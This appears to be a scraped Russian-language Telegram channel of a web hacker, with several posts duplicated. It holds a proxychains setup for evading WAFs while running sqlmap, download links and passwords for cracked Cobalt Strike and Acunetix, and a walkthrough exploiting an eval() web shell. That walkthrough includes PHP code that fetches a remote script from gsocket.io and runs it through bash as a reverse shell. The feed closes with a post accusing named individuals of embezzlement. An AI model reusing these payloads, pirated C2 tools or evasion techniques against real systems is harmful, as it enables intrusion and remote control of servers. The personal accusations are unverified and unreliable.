image_2021-04-21_11-13-08.png
10.3 KB
#waf #proxy #config #proxychains
Лайфхак как юзать прокси для обхода ваф, когда нужно, к примеру, каждый запрос делать с другого ипа.
Лайфхак как юзать прокси для обхода ваф, когда нужно, к примеру, каждый запрос делать с другого ипа.
apt install proxychainsПосле запускаем любой скрипт через proxychains типа
nano /etc/proxychains.conf
random_chain
chain_len = 1
quiet_mode
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 93.177.***.*** 1085
заполняем кучей проксей
proxychains sqlmap.py
#script #Полезные_Штуки
https://github.com/aboul3la/Sublist3r
Скрипт для поиска поддоменов.
https://github.com/aboul3la/Sublist3r
Скрипт для поиска поддоменов.
python sublist3r.py -d domain.ru
Cobalt Strike 4.9
Download:
Download:
https://ponies.cloud/c2/CobaltStrike%204.9%20Cracked%20uCare@Pwn3rzs.7z
Password: 20231004_2218
Full Black client: https://ponies.cloud/c2/CobaltStrike%204.9%20Client%20Only%20Full%20Theme%20uCare@Pwn3rzs.7z
Password: 20231005_2033👍1
Acunetix_23.11.rar
256.7 MB
Буду иногда выкладывать тем, чем пользуюсь и писать заметки иногда, а то сохранённые сообщения уже переполнены 😆
MoElDump-master.zip
10.4 KB
Дампер написали уже пару лет назад, но всё равно иногда пользуюсь (под монгодб и эластик)
❤1
Коменты открыл и привязал чатик 😆. Мой главный вопрос, откуда вы узнали про этот канал?) я его забросил в 2023 году, неужели нужно дальше выкладывать такие штуки?
Знаю, что многие используют окунь немного неправильно, вот одна из причин (возможно кто-то не знал про это)
1. Первым делом мы должны с вами запустить Burp, залогинится в нашу цель, тыкнуть на таргеты и сохранить все запросы в xml.
2. Кормим этот файл в акунетикс
Это довольно сильно повысит ваши шансы найти уязвимости в тех сайтах, где нужна авторизация.
1. Первым делом мы должны с вами запустить Burp, залогинится в нашу цель, тыкнуть на таргеты и сохранить все запросы в xml.
2. Кормим этот файл в акунетикс
Это довольно сильно повысит ваши шансы найти уязвимости в тех сайтах, где нужна авторизация.
❤8👍2
Web Application Security Notes
#script #Полезные_Штуки https://github.com/aboul3la/Sublist3r Скрипт для поиска поддоменов. python sublist3r.py -d domain.ru
https://www.youtube.com/shorts/qn6OGt6GqHQ
В прошлый раз, я показывал как собирать поддомены и выкладывал скрипт, но это было в 2021 году... Сейчас появились инструменты получше:
Теперь мы можем увидеть не только зарегистрированные поддомены, но и те которые резолвятся, какой ответ получают, подключать куча сервисов по апишке и даже выстраивать графики.
https://github.com/screetsec/Sudomy.git
В прошлый раз, я показывал как собирать поддомены и выкладывал скрипт, но это было в 2021 году... Сейчас появились инструменты получше:
Теперь мы можем увидеть не только зарегистрированные поддомены, но и те которые резолвятся, какой ответ получают, подключать куча сервисов по апишке и даже выстраивать графики.
https://github.com/screetsec/Sudomy.git
./sudomy -d domain -dP -eP -rS -cF -pS -tO -gW --httpx -aI webanalyze -sS
GitHub
GitHub - screetsec/Sudomy: Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated…
Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting - screetsec/Sudomy
👍5❤2
История о том, как я решил пройти собеседование в двух компаниях ПТ и Грибы (facct), специализирующейся на информационной безопасности, приводит меня к размышлениям о процессе найма и работе в области пентестов веб приложений.
Первые собеседования с представителями отдела кадров прошли гладко. Обсуждались общие темы, вопросы о типах уязвимостей, клиент сайд, сервер сайд, разновидности xss и другие общие вопросы. Эти этапы были стандартными и предсказуемыми. Затем настало время технических собеседований.
Ожидания от технической части интервью были высоки, учитывая мой опыт работы в отрасли уже более пяти лет и должность на довольно высокой позиции... Начало технического интервью было обещающим, задавались типичные сценарии веб-приложений и обсуждались возможные векторы атак. Однако процесс внезапно стал затянутым и направлен на администрирование, что меня сильно удивило.
Во время интервью меня начали расспрашивать о темах, не относящихся к пентестам, таких как настройка cross-domain policy и другие административные аспекты. Это вызвало у меня недоумение, потому что я считаю, что подобные моменты можно прогуглить, ну надо тебе настроить, ну напиши в гугле и настрой, нахера мне учить это? Вопросы о работе сериализации и десериализации на различных языках также отклонились от темы пентестов. Мне показалось что им гораздо важней, чтобы я смог написать им уязвимое приложение, нежели найти уязвимости в реальных приложениях.
Итогом этого опыта стала потеря нервов и понимание того, что компания не сосредоточена на реальных пентестах, а больше на том, чтобы состряпать им очередной хакатончик, цтфочку, стэндофчик или митап. Работники больше ориентированы на тендеры в ASV сканировании похоже, чем на практическую работу с безопасностью. Видимо, они просто сидят, сканируют, потом переводят отчёт со сканера, получают деньги и всё, на эти деньги делают какие-то мероприятия. Это могло привести к недостаткам в области информационной безопасности, особенно с учетом уязвимости многих государственных приложений в последнее время.
Мой совет для тех, кто ищет работу в области информационной безопасности, - выбирайте компании, где ценится реальное практическое понимание области, а не только теоретические знания. Ищите единомышленников, увлеченных информационной безопасностью на деле, а не только на бумаге.
Первые собеседования с представителями отдела кадров прошли гладко. Обсуждались общие темы, вопросы о типах уязвимостей, клиент сайд, сервер сайд, разновидности xss и другие общие вопросы. Эти этапы были стандартными и предсказуемыми. Затем настало время технических собеседований.
Ожидания от технической части интервью были высоки, учитывая мой опыт работы в отрасли уже более пяти лет и должность на довольно высокой позиции... Начало технического интервью было обещающим, задавались типичные сценарии веб-приложений и обсуждались возможные векторы атак. Однако процесс внезапно стал затянутым и направлен на администрирование, что меня сильно удивило.
Во время интервью меня начали расспрашивать о темах, не относящихся к пентестам, таких как настройка cross-domain policy и другие административные аспекты. Это вызвало у меня недоумение, потому что я считаю, что подобные моменты можно прогуглить, ну надо тебе настроить, ну напиши в гугле и настрой, нахера мне учить это? Вопросы о работе сериализации и десериализации на различных языках также отклонились от темы пентестов. Мне показалось что им гораздо важней, чтобы я смог написать им уязвимое приложение, нежели найти уязвимости в реальных приложениях.
Итогом этого опыта стала потеря нервов и понимание того, что компания не сосредоточена на реальных пентестах, а больше на том, чтобы состряпать им очередной хакатончик, цтфочку, стэндофчик или митап. Работники больше ориентированы на тендеры в ASV сканировании похоже, чем на практическую работу с безопасностью. Видимо, они просто сидят, сканируют, потом переводят отчёт со сканера, получают деньги и всё, на эти деньги делают какие-то мероприятия. Это могло привести к недостаткам в области информационной безопасности, особенно с учетом уязвимости многих государственных приложений в последнее время.
Мой совет для тех, кто ищет работу в области информационной безопасности, - выбирайте компании, где ценится реальное практическое понимание области, а не только теоретические знания. Ищите единомышленников, увлеченных информационной безопасностью на деле, а не только на бумаге.
😁3
Если у кого-то есть хостинг серверов, которые не блочат - напишите, нексус отпал 😆
Из интересного:
Дано: веб приложение с eval($cmd); почти все пхп функции отключены (system, passthru, exec, shell_exec). evalsploit не помогает
Решение:
Получаем пхпинфо и смотрим какие функции отключены.
Далее получаем список доступных функций:
В данном веб приложении была обнаружена функция "popen", выполняем whoami
Выбираем реверс шелл, в данном случае я использовал gsocket
Профит (скрины в комменты закину)
Дано: веб приложение с eval($cmd); почти все пхп функции отключены (system, passthru, exec, shell_exec). evalsploit не помогает
Решение:
Получаем пхпинфо и смотрим какие функции отключены.
shell.php?cmd=phpinfo();
Далее получаем список доступных функций:
shell.php?cmd=print_r(get_defined_functions());
В данном веб приложении была обнаружена функция "popen", выполняем whoami
shell.php?cmd=$h=popen(%27whoami%27,%27r%27);echo%20fread($h,4096);pclose($h);
Выбираем реверс шелл, в данном случае я использовал gsocket
eval('
$cmd = file_get_contents("http://gsocket.io/y");
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("bash -c \"$cmd\"", $descriptorspec, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo $output;
}
');Профит (скрины в комменты закину)
❤4👍4
Написал небольшую статью, по не сильно популярной (на данный момент) технике sql injection.
Скриншоты и описание были сделаны под тестовую среду, но побудило меня разобраться и сделать этот пост реальный кейс, который к сожалению на данный момент я не могу разглашать.
https://telegra.ph/Voice-Based-SQL-Injection-03-07
P.S вкратце кейс был такой: была строка поиска и был голосовой ввод, если пишешь ковычку - то всё норм, если говоришь её типа quote, то он sql лог вываливал
Скриншоты и описание были сделаны под тестовую среду, но побудило меня разобраться и сделать этот пост реальный кейс, который к сожалению на данный момент я не могу разглашать.
https://telegra.ph/Voice-Based-SQL-Injection-03-07
P.S вкратце кейс был такой: была строка поиска и был голосовой ввод, если пишешь ковычку - то всё норм, если говоришь её типа quote, то он sql лог вываливал
Telegraph
Voice-Based SQL Injection
На днях обнаружил интересную фичу, и решил немного описать принцип работы, постараюсь описать максимально обезличено, чтобы не было понятно какой продукт был (или до сих пор) уязвим к данной технике. 1. Введение С развитием голосовых интерфейсов и голосовых…
👍6
Наш чатик "хацкеров" был заблокирован (непонятно за что, саппорт так и не ответил), поэтому новый открыт, для тех кто потерял "Hiddmond" - заходите https://t.me/hiddmond0
image_2025-03-26_22-10-36.png
77.6 KB
Эм, господа из ФБР, вы могли мне просто на почту или в тг написать... 😆
😁1
Небольшая статья про Malvertising, всё сказанное выдумано, все совпадения случайны
https://telegra.ph/Malvertising-ili-Kak-zarazit-80-000-ustrojstv-cherez-reklamu-06-09
https://telegra.ph/Malvertising-ili-Kak-zarazit-80-000-ustrojstv-cherez-reklamu-06-09
❤4👍1🤯1
#Расследование #газпром #Троицк #часть1
Как отмываются миллионы рублей на строительных работах
В течение последних месяцев мною ведётся тщательное изучение деятельности филиала ПАО «ОГК-2» в городе Троицке (Челябинская область). В результате анализа внутренних документов, смет, актов выполненных работ и наглядных фото с объектов, выявлены признаки масштабного хищения бюджетных средств и злоупотреблений служебным положением.
Фигуранты: Селивёрстов, Птичкин и не только
Изначально подозрения вызывали действия двух должностных лиц — Селивёрстова и Птичкина, однако в процессе изучения документов выяснилось, что круг вовлечённых лиц шире. Более того, за время своей работы в Троицке Селивёрстов, по имеющимся сведениям, приобрёл коттедж, автомобиль и получил наличными несколько миллионов рублей. Это особенно подозрительно, учитывая его официальную зарплату.
Схема: завышение стоимости работ в 10 раз и «освоение» средств
Ключевая схема — завышение стоимости строительных и монтажных работ (СМР), а также оборудования в разы выше рыночной. Пример — строительство бетонных укрытий. Согласно расчётам:
Фактическая себестоимость одного укрытия: 350 000 руб.
Стоимость по договору: 3 360 000 руб.
Разница: 3 010 000 руб. с одного укрытия
Всего таких укрытий — 8
→ Общая «дополнительная маржа» составила 24 080 000 руб.
Эти расчёты подтверждаются сметами, актами КС-2 и справками КС-3, подписанными руководством филиала и подрядчиком ООО «НПП "АИМ"».
Подрядчик — аффилированная компания?
Подрядчиком выступает ООО «НПП "АИМ"» (г. Москва), что уже вызывает вопросы: почему московская компания привлекается для несложных бетонных работ в Челябинской области? Признаки аффилированности или фиктивности подрядной схемы налицо.
Документальное подтверждение
В моём распоряжении:
Акты приёмки выполненных работ и справки о стоимости затрат (КС-2 и КС-3);
Сметные документы и сопроводительное письмо от подрядчика;
Фотофакты с территории Троицкой ГРЭС, подтверждающие реальные объёмы и стоимость работ;
Расчётная таблица по фактической себестоимости и завышенным суммам по контракту.
Заключение
Все вышеперечисленные данные свидетельствуют о систематическом отмывании средств через завышенные подрядные работы и фиктивные схемы. Учитывая суммы, речь идёт о многомиллионных хищениях.
Настоящее сообщение — часть готовящегося пакета документов, который в ближайшие месяцы будет направлен в ОБЭП и иные надзорные органы. Надеюсь на всестороннюю проверку и объективную оценку ситуации компетентными органами.
Как отмываются миллионы рублей на строительных работах
В течение последних месяцев мною ведётся тщательное изучение деятельности филиала ПАО «ОГК-2» в городе Троицке (Челябинская область). В результате анализа внутренних документов, смет, актов выполненных работ и наглядных фото с объектов, выявлены признаки масштабного хищения бюджетных средств и злоупотреблений служебным положением.
Фигуранты: Селивёрстов, Птичкин и не только
Изначально подозрения вызывали действия двух должностных лиц — Селивёрстова и Птичкина, однако в процессе изучения документов выяснилось, что круг вовлечённых лиц шире. Более того, за время своей работы в Троицке Селивёрстов, по имеющимся сведениям, приобрёл коттедж, автомобиль и получил наличными несколько миллионов рублей. Это особенно подозрительно, учитывая его официальную зарплату.
Схема: завышение стоимости работ в 10 раз и «освоение» средств
Ключевая схема — завышение стоимости строительных и монтажных работ (СМР), а также оборудования в разы выше рыночной. Пример — строительство бетонных укрытий. Согласно расчётам:
Фактическая себестоимость одного укрытия: 350 000 руб.
Стоимость по договору: 3 360 000 руб.
Разница: 3 010 000 руб. с одного укрытия
Всего таких укрытий — 8
→ Общая «дополнительная маржа» составила 24 080 000 руб.
Эти расчёты подтверждаются сметами, актами КС-2 и справками КС-3, подписанными руководством филиала и подрядчиком ООО «НПП "АИМ"».
Подрядчик — аффилированная компания?
Подрядчиком выступает ООО «НПП "АИМ"» (г. Москва), что уже вызывает вопросы: почему московская компания привлекается для несложных бетонных работ в Челябинской области? Признаки аффилированности или фиктивности подрядной схемы налицо.
Документальное подтверждение
В моём распоряжении:
Акты приёмки выполненных работ и справки о стоимости затрат (КС-2 и КС-3);
Сметные документы и сопроводительное письмо от подрядчика;
Фотофакты с территории Троицкой ГРЭС, подтверждающие реальные объёмы и стоимость работ;
Расчётная таблица по фактической себестоимости и завышенным суммам по контракту.
Заключение
Все вышеперечисленные данные свидетельствуют о систематическом отмывании средств через завышенные подрядные работы и фиктивные схемы. Учитывая суммы, речь идёт о многомиллионных хищениях.
Настоящее сообщение — часть готовящегося пакета документов, который в ближайшие месяцы будет направлен в ОБЭП и иные надзорные органы. Надеюсь на всестороннюю проверку и объективную оценку ситуации компетентными органами.
👍3🤯2❤1